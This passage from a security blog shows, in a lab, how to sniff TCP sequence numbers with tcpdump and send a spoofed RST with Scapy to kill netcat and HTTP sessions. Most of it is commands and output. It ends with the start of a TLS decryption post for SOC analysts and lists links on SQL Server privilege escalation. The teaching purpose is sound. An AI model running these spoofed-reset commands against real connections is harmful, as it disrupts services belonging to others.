href="https://learn.microsoft.com/en-us/sql/relational-databases/system-catalog-views/sys-tables-transact-sql?view=sql-server-ver16">https://learn.microsoft.com/en-us/sql/relational-databases/system-catalog-views/sys-tables-transact-sql?view=sql-server-ver16</a></div><div><a href="https://learn.microsoft.com/en-us/sql/relational-databases/system-catalog-views/sys-database-principals-transact-sql?view=sql-server-ver16">https://learn.microsoft.com/en-us/sql/relational-databases/system-catalog-views/sys-database-principals-transact-sql?view=sql-server-ver16</a></div><div><a href="https://learn.microsoft.com/en-us/sql/relational-databases/system-catalog-views/sys-server-principals-transact-sql?view=sql-server-ver16">https://learn.microsoft.com/en-us/sql/relational-databases/system-catalog-views/sys-server-principals-transact-sql?view=sql-server-ver16</a></div><div><a href="https://learn.microsoft.com/en-us/sql/relational-databases/system-catalog-views/sys-server-permissions-transact-sql?view=sql-server-ver16">https://learn.microsoft.com/en-us/sql/relational-databases/system-catalog-views/sys-server-permissions-transact-sql?view=sql-server-ver16</a></div><div><a href="https://en.dirceuresende.com/blog/sql-server-como-utilizar-o-execute-as-para-executar-comandos-como-outro-usuario-impersonate-e-como-impedir-isso/">https://en.dirceuresende.com/blog/sql-server-como-utilizar-o-execute-as-para-executar-comandos-como-outro-usuario-impersonate-e-como-impedir-isso/</a></div><div><a href="https://learn.microsoft.com/en-us/sql/relational-databases/security/trustworthy-database-property?view=sql-server-ver16">https://learn.microsoft.com/en-us/sql/relational-databases/security/trustworthy-database-property?view=sql-server-ver16</a></div><div><a href="https://learn.microsoft.com/en-us/sql/t-sql/functions/is-srvrolemember-transact-sql?view=sql-server-ver16">https://learn.microsoft.com/en-us/sql/t-sql/functions/is-srvrolemember-transact-sql?view=sql-server-ver16</a></div><div><a href="https://learn.microsoft.com/en-us/sql/relational-databases/databases/master-database?view=sql-server-ver16">https://learn.microsoft.com/en-us/sql/relational-databases/databases/master-database?view=sql-server-ver16</a></div><div><a href="https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-configure-transact-sql?view=sql-server-ver16">https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-configure-transact-sql?view=sql-server-ver16</a></div><div><a href="http://sp-configure.com/tips-tricks/sp_configure-command/">http://sp-configure.com/tips-tricks/sp_configure-command/</a></div><div><a href="https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver16">https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver16</a></div><div><a href="https://learn.microsoft.com/en-us/sql/t-sql/statements/enable-trigger-transact-sql?view=sql-server-ver16">https://learn.microsoft.com/en-us/sql/t-sql/statements/enable-trigger-transact-sql?view=sql-server-ver16</a></div><div><a href="https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-dropsrvrolemember-transact-sql?view=sql-server-ver16">https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-dropsrvrolemember-transact-sql?view=sql-server-ver16</a></div><div><a href="https://www.iana.org/assignments/icmp-parameters/icmp-parameters.xhtml">https://www.iana.org/assignments/icmp-parameters/icmp-parameters.xhtml</a></div><div><a href="https://learn.microsoft.com/en-us/sql/t-sql/statements/create-trigger-transact-sql?view=sql-server-ver16">https://learn.microsoft.com/en-us/sql/t-sql/statements/create-trigger-transact-sql?view=sql-server-ver16</a></div><div><a href="https://www.mssqltips.com/sqlservertip/5995/how-to-create-modify-or-drop-a-sql-server-trigger/">https://www.mssqltips.com/sqlservertip/5995/how-to-create-modify-or-drop-a-sql-server-trigger/</a></div><div><a href="https://learn.microsoft.com/en-us/sql/t-sql/statements/execute-as-transact-sql?view=sql-server-ver16">https://learn.microsoft.com/en-us/sql/t-sql/statements/execute-as-transact-sql?view=sql-server-ver16</a></div><div><a href="https://linux.die.net/man/1/nmap">https://linux.die.net/man/1/nmap</a></div><div><a href="https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.3">https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.3</a></div></div><div><div><a href="https://stackoverflow.com/questions/1425493/convert-hex-to-binary">https://stackoverflow.com/questions/1425493/convert-hex-to-binary</a></div><div><a href="https://stackoverflow.com/questions/10411085/converting-integer-to-binary-in-python">https://stackoverflow.com/questions/10411085/converting-integer-to-binary-in-python</a></div><div><a href="https://www.instructables.com/Hiding-Data-Inside-an-Image-Using-Python/">https://www.instructables.com/Hiding-Data-Inside-an-Image-Using-Python/</a></div><div><a href="https://www.youtube.com/watch?v=TWEXCYQKyDc">https://www.youtube.com/watch?v=TWEXCYQKyDc</a></div><div><a href="https://betterprogramming.pub/image-steganography-using-python-2250896e48b9">https://betterprogramming.pub/image-steganography-using-python-2250896e48b9</a></div><div><a href="https://vigrey.com/blog/encoding-information-into-images">https://vigrey.com/blog/encoding-information-into-images</a></div></div></div>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com3tag:blogger.com,1999:blog-7303400454979750101.post-8978108828386773922023-09-01T13:30:00.001-07:002023-09-01T14:06:58.434-07:00Packet Crafting - Tearing down a connection with TCP Reset<p>In a <a href="https://www.securitynik.com/2014/05/building-your-own-tcp-3-way-handshake.html" target="_blank">previous post</a>, I crafted a TCP 3-way handshake, to setup a connection with a remote device. In this post, we are going to sniff traffic between two devices and send a <i>RST </i>packet to tear down the connection. Think about what your IPS does as you go through this post.</p><p>First up, the manual process. Let's say a server (in this case <i>netcat</i>) is listening on port 9999 as shown here.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sans@sec503:~$ nc -l -p 9999 -n -v -4</span>
<span style="color: white;">Listening on 0.0.0.0 9999</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>and here ....</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sans@sec503:~/nik$ ss --numeric --listening --tcp | grep 9999</span>
<span style="color: white;">LISTEN 0 1 0.0.0.0:9999 0.0.0.0:*</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>To be able to send a <i>RST</i>, we have to be able to see the traffic. Let's go ahead and setup <i>tcpdump </i>on our attacking machine to capture the traffic.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿hack-detect)-[~]</span>
<span style="color: white;">└─$ sudo tcpdump -nnti eth0 port 9999 -v -S 2>/dev/null</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>With <i>tcpdump </i>running, whenever a client connects such as from the server side:</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sans@sec503:~$ nc -l -p 9999 -n -v -4</span>
<span style="color: white;">Listening on 0.0.0.0 9999</span>
<span style="color: white;">Connection received on 192.168.240.1 55768</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>This session establishment can be confirmed by looking at the socket statistics via ss.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sans@sec503:~/nik$ ss --numeric --tcp | grep 9999</span>
<span style="color: white;">ESTAB 0 0 192.168.240.128:9999 192.168.240.1:55768</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>With this in place, we see from <i>tcpdump </i>perspective .....</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">IP (tos 0x0, ttl 64, id 38378, offset 0, flags [DF], proto TCP (6), length 60)</span>
<span style="color: white;"> 172.17.113.108.38364 > 192.168.240.128.9999: Flags [S], cksum 0xced5 (incorrect -> 0xd2e3), seq 2755343805, win 64240, options [mss 1460,sackOK,TS val 1927258560 ecr 0,nop,wscale 7], length 0</span>
<span style="color: white;">IP (tos 0x0, ttl 63, id 0, offset 0, flags [DF], proto TCP (6), length 60)</span>
<span><span style="color: white;"> 192.168.240.128.9999 > 172.17.113.108.38364: Flags [S.], cksum 0x3978 (correct), seq 1881702073, ack </span><b><span style="color: #fcff01;">2755343806</span></b><span style="color: white;">, win 65160, options [mss 1460,sackOK,TS val 4253133150 ecr 1927258560,nop,wscale 7], length 0</span></span>
<span style="color: white;">IP (tos 0x0, ttl 64, id 38379, offset 0, flags [DF], proto TCP (6), length 52)</span>
<span style="color: white;"> 172.17.113.108.38364 > 192.168.240.128.9999: Flags [.], cksum 0xcecd (incorrect -> 0x64d6), ack 1881702074, win 502, options [nop,nop,TS val 1927258561 ecr 4253133150], length 0</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>While this communication remains idle, we are going to attempt to pretend to be the client, sending a message (RST packet) to the server to take down the connection. What we need from client perspective above, is it's source IP, source port and most importantly, the correct sequence number to send to the device on the other end. Fortunately for us, this information was captured by <i>tcpdump</i>. </div><div><br /></div><div>From above, when the server sent its <i>SYN/ACK</i> to the client, the acknowledgement number it specified is "2755343806". This represents the next expected sequence number from the client. With this in mind, let's craft a packet with <i>Scapy </i>to send this <i>RST </i>packet to the server.</div><div><br /></div></div><div>Using <i>Scapy </i>to craft and send packet.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8
9</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿hack-detect)-[~]</span>
<span style="color: white;">└─$ sudo scapy -H</span>
<span style="color: white;">[sudo] password for securitynik:</span>
<span style="color: white;">Welcome to Scapy (2.5.0) using IPython 8.5.0</span>
<span><span style="color: white;">>>> send(IP(src='172.17.113.108', dst='192.168.240.128')/TCP(sport=38364, dport=9999, flags='R', seq=</span><b><span style="color: #fcff01;">2755343806</span></b><span style="color: white;">)/"Boo I</span></span>
<span style="color: white;">...: Reset You!", count=1)</span>
<span style="color: white;">.</span>
<span style="color: white;">Sent 1 packets.</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Looking from our <i>tcpdump </i>perspective we see on the wire.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto TCP (6), length 56)</span>
<span style="color: white;"> 172.17.113.108.38364 > 192.168.240.128.9999: Flags [</span><span style="color: #fcff01;"><b>R</b></span><span><span style="color: white;">], cksum 0x2718 (correct), seq </span><b><span style="color: #fcff01;">2755343806</span></b><span style="color: white;">:2755343822, win 8192, length 16 [RST Boo I Reset You!]</span></span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>Looking at the server side of the <i>nectat</i> session we see it died as <i>ss</i> returns nothing for any of the two commands we previously run.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sans@sec503:~/nik$ ss --numeric --listening --tcp | grep 9999</span>
<span style="color: white;">sans@sec503:~/nik$ ss --numeric --tcp | grep 9999</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>Interestingly, the <i>ncat </i>client did not die immediately. </div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿hack-detect)-[~]</span>
<span style="color: white;">└─$ ncat --verbose 192.168.240.128 9999</span>
<span style="color: white;">Ncat: Version 7.93 ( https://nmap.org/ncat )</span>
<span style="color: white;">Ncat: Connected to 192.168.240.128:9999.</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>However, if you do try to use it to send some data to the server or even simply press <i>ENTER</i>, it will die with the following message:</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">Ncat: Connection reset by peer.</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>Let's give it another shot. This time, let's try to reset the connection between <i>netcat</i> and Python <i>http.server</i> running on port <i>8080</i>. We will follow the same concepts as above.</div><div><br /></div><div>Start up the web server</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sans@sec503:~$ python3 -m http.server 8080</span>
<span style="color: white;">Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...</span>
</pre></td></tr></tbody></table></div>
</div><div><div>Validate the session is listening.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sans@sec503:~/nik$ ss --numeric --listening --tcp | grep 8080</span>
<span style="color: white;">LISTEN 0 5 0.0.0.0:8080 0.0.0.0:*</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>As before, we need to be sniffing the traffic. Let's setup our <i>tcpdump</i>.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿hack-detect)-[~]</span>
<span style="color: white;">└─$ sudo tcpdump -nnti eth0 port 8080 -v -S 2>/dev/null</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>Connect with <i>ncat</i> to the web server</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿hack-detect)-[~]</span>
<span style="color: white;">└─$ ncat --verbose 192.168.240.128 8080</span>
<span style="color: white;">Ncat: Version 7.93 ( https://nmap.org/ncat )</span>
<span style="color: white;">Ncat: Connected to 192.168.240.128:8080.</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>Validate on the server that the connection is established.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sans@sec503:~/nik$ ss --numeric --tcp | grep 8080</span>
<span style="color: white;">ESTAB 0 0 192.168.240.128:8080 192.168.240.1:55842</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>Using the knowledge we acquired earlier, let's send a reset to the web server, pretending to be the client.</div><div><br /></div><div>Once again, <i>scapy</i> to the rescue. Using the <i>ACK </i>number from the <i>SYN/ACK</i> packet we craft and send RST packet.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">>>> send(IP(src='172.17.113.108', dst='192.168.240.128')/TCP(sport=53578, dport=8080, flags='R', seq=</span><b><span style="color: #fcff01;">3771376712</span></b><span style="color: white;">)/"Boo I</span></span>
<span style="color: white;">...: Reset You!", count=1)</span>
<span style="color: white;">.</span>
<span style="color: white;">Sent 1 packets.</span>
<span style="color: white;">>>></span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>Looking at our <i>tcpdump</i> output, we see, </div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">172.17.113.108.53578 > 192.168.240.128.8080: Flags [</span><b><span style="color: #fcff01;">R</span></b><span style="color: white;">], cksum 0x480f (correct), seq </span><span style="color: #fcff01;"><b>3771376712</b></span><span style="color: white;">:3771376728, win 8192, length 16 [RST Boo I Reset You!]</span></span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>Did this work though? Let's look at the web server standard error messages.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">----------------------------------------</span>
<span style="color: white;">Exception occurred during processing of request from ('192.168.240.1', 55842)</span>
<span style="color: white;">Traceback (most recent call last):</span>
<span style="color: white;"> File "/usr/lib/python3.10/socketserver.py", line 683, in process_request_thread</span>
<span style="color: white;"> self.finish_request(request, client_address)</span>
<span style="color: white;"> File "/usr/lib/python3.10/http/server.py", line 1287, in finish_request</span>
<span style="color: white;"> self.RequestHandlerClass(request, client_address, self,</span>
<span style="color: white;"> File "/usr/lib/python3.10/http/server.py", line 651, in __init__</span>
<span style="color: white;"> super().__init__(*args, **kwargs)</span>
<span style="color: white;"> File "/usr/lib/python3.10/socketserver.py", line 747, in __init__</span>
<span style="color: white;"> self.handle()</span>
<span style="color: white;"> File "/usr/lib/python3.10/http/server.py", line 425, in handle</span>
<span style="color: white;"> self.handle_one_request()</span>
<span style="color: white;"> File "/usr/lib/python3.10/http/server.py", line 393, in handle_one_request</span>
<span style="color: white;"> self.raw_requestline = self.rfile.readline(65537)</span>
<span style="color: white;"> File "/usr/lib/python3.10/socket.py", line 705, in readinto</span>
<span style="color: white;"> return self._sock.recv_into(b)</span>
<span style="color: white;">ConnectionResetError: [Errno 104] Connection reset by peer</span>
<span style="color: white;">----------------------------------------</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>Confirming via the <i>ss </i>command, the sessionis no longer established as nothing was returned.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sans@sec503:~/nik$ ss --numeric --tcp | grep 8080</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>Once again, the <i>ncat </i>hung.</div></div><div><br /></div><div><div>With this understanding your next step would be to automate this process. </div><div><br /></div><div>Good Reads:</div><div><a href="https://robertheaton.com/2020/04/27/how-does-a-tcp-reset-attack-work/">https://robertheaton.com/2020/04/27/how-does-a-tcp-reset-attack-work/</a></div><div><a href="https://squidarth.com/article/networking/2020/05/03/tcp-resets.html">https://squidarth.com/article/networking/2020/05/03/tcp-resets.html</a></div><div><a href="https://github.com/robert/how-does-a-tcp-reset-attack-work/blob/master/main.py">https://github.com/robert/how-does-a-tcp-reset-attack-work/blob/master/main.py</a></div></div>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com4tag:blogger.com,1999:blog-7303400454979750101.post-60664922221212927872023-08-09T08:13:00.001-07:002023-08-12T08:05:04.215-07:00Understanding and Decrypting TLS based communication - HTTP over TLS (HTTPS)<p>As a leader in a SOC at a Managed Security Services Provider (MSSP), leading multiple teams, it is always interesting to see how new Analysts may freeze when they hear the communication is encrypted. What many of these new Analysts do not know, is in some cases, you may be able to decrypt this communication.</p><p>This post provides guidance to these new Analyst, to reduce their fear about being able to decrypt Transport Layer Security (TLS). Do keep in mind, while some of the TLS communication can be decrypted, there are many organizations which do not decrypt it.</p><p>As a result, let's take the opportunity to learn about TLS (some people still say SSL), starting with 1.0 before we even transition to the latest version (at the time of this writing) 1.3. A little theory is needed, before attempting to decrypt this communication.</p><p>Before going further, let's understand why we might or might not want encryption.</p><p>Here is a client and server session using <i>ncat</i>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ sudo ncat --verbose --listen 127.0.0.1 80 --nodns</span>
<span style="color: white;">Ncat: Version 7.94 ( https://nmap.org/ncat )</span>
<span style="color: white;">Ncat: Listening on 127.0.0.1:80</span>
<span style="color: white;">Ncat: Connection from 127.0.0.1:55006.</span>
<span style="color: #fcff01;"><b><span>peek-a-boo, I can see you!</span>
<span>Ooops, maybe we should encrypt this session!</span></b></span>
<span style="color: white;">-----------------</span>
<span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ ncat --verbose 127.0.0.1 80</span>
<span style="color: white;">Ncat: Version 7.94 ( https://nmap.org/ncat )</span>
<span style="color: white;">Ncat: Connected to 127.0.0.1:80.</span>
<b><span style="color: #fcff01;"><span>peek-a-boo, I can see you!</span>
<span>Ooops, maybe we should encrypt this session!</span></span></b><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>And here is the <i>tcpdump </i>output of that session.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ sudo tcpdump -nnti lo port 80 -A 2>/dev/null </span>
<span style="color: white;">IP 127.0.0.1.55006 > 127.0.0.1.80: Flags [P.], seq 3979765296:3979765323, ack 2665935488, win 512, options [nop,nop,TS val 3445312889 ecr 3445288637], length 27: HTTP</span>
<span style="color: white;">E..O.S@.@..S...........P.6f0.........C.....</span>
<span><span style="color: white;">.[My.Z..</span><b><span style="color: #fcff01;">peek-a-boo, I can see you!</span></b></span>
<span style="color: white;">IP 127.0.0.1.80 > 127.0.0.1.55006: Flags [.], ack 27, win 512, options [nop,nop,TS val 3445312889 ecr 3445312889], length 0</span>
<span style="color: white;">E..4`_@.@..b.........P.......6fK.....(.....</span>
<span style="color: white;">.[My.[My</span>
<span style="color: white;">IP 127.0.0.1.80 > 127.0.0.1.55006: Flags [P.], seq 1:46, ack 27, win 512, options [nop,nop,TS val 3445324807 ecr 3445312889], length 45: HTTP</span>
<span style="color: white;">E..a``@.@..4.........P.......6fK.....U.....</span>
<span><span style="color: white;">.[|..[My</span><b><span style="color: #fcff01;">Ooops, maybe we should encrypt this session!</span></b></span>
<span style="color: white;">IP 127.0.0.1.55006 > 127.0.0.1.80: Flags [.], ack 46, win 512, options [nop,nop,TS val 3445324807 ecr 3445324807], length 0</span>
<span style="color: white;">E..4.T@.@..m...........P.6fK.........(.....</span>
<span style="color: white;">.[|..[|.</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
</div><p>From monitoring of our enterprises, obviously, the more visibility we have the better we should be able to monitor. However, that visibility comes at a cost and makes it easier for threat actors to sniff traffic when on our networks and can exfiltrate data this way also.</p><p>Let's encrypt this communication. Here is the new <i>ncat </i>sessions.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span><span style="color: white;">└─$ sudo ncat --verbose --listen 127.0.0.1 80 --nodns </span><b><span style="color: #fcff01;">--ssl</span></b></span>
<span style="color: white;">Ncat: Version 7.94 ( https://nmap.org/ncat )</span>
<span style="color: white;">Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.</span>
<span style="color: white;">Ncat: SHA-1 fingerprint: 8119 9A0B E2D0 4859 3357 56A2 A873 A544 9BB5 C9BC</span>
<span style="color: white;">Ncat: Listening on 127.0.0.1:80</span>
<span style="color: white;">Ncat: Connection from 127.0.0.1:59900.</span>
<b><span style="color: #fcff01;"><span>Bet you can't see me now :-)</span>
<span>I can see you but the sniffer can't :-D</span></span></b>
<span style="color: white;">-----------------</span>
<span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span><span style="color: white;">└─$ ncat --verbose 127.0.0.1 80 </span><b><span style="color: #fcff01;">--ssl</span></b></span>
<span style="color: white;">Ncat: Version 7.94 ( https://nmap.org/ncat )</span>
<span style="color: white;">Ncat: Subject: CN=127.0.0.1</span>
<span style="color: white;">Ncat: Issuer: CN=127.0.0.1</span>
<span style="color: white;">Ncat: SHA-1 fingerprint: 8119 9A0B E2D0 4859 3357 56A2 A873 A544 9BB5 C9BC</span>
<span style="color: white;">Ncat: Certificate verification failed (self-signed certificate).</span>
<span style="color: white;">Ncat: SSL connection to 127.0.0.1:80.</span>
<span style="color: white;">Ncat: SHA-1 fingerprint: 8119 9A0B E2D0 4859 3357 56A2 A873 A544 9BB5 C9BC</span>
<b><span style="color: #fcff01;"><span>Bet you can't see me now :-)</span>
<span>I can see you but the sniffer can't :-D</span></span></b><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
